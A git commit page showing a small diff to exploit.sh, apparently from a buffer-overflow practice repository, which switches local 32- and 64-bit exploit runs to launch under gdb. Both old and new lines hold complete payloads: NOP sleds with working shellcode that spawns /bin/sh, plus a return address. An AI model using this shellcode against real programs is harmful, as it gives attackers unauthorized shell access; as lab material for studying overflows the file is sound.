diff options
| author | Toni Uhlig <matzeton@googlemail.com> | 2018-07-11 10:19:46 +0200 |
|---|---|---|
| committer | Toni Uhlig <matzeton@googlemail.com> | 2018-07-11 10:19:46 +0200 |
| commit | d3706047194005ce1cb97c2909f25bd1877115f1 (patch) | |
| tree | 7dcca9752a891e8feb068d8a600884d0c7948d73 /exploit.sh | |
| parent | 71e27ae1766e0090fa989aad7ee930152a1921de (diff) | |
improvements
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
Diffstat (limited to 'exploit.sh')
| -rwxr-xr-x | exploit.sh | 4 |
1 files changed, 2 insertions, 2 deletions
@@ -67,14 +67,14 @@ if [ "$1" = "local32" ]; then # NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4) # uses own shellcode: shellcode/hello.asm (x86-nasm) echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}" - ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"') + gdb -ex r --args ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"') elif [ "$1" = "local64" ]; then # NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8) # uses own shellcode: shellcode/execve_x64.o echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}" - gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"') + gdb -ex r --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"') elif [ "$1" = "bind32" ]; then |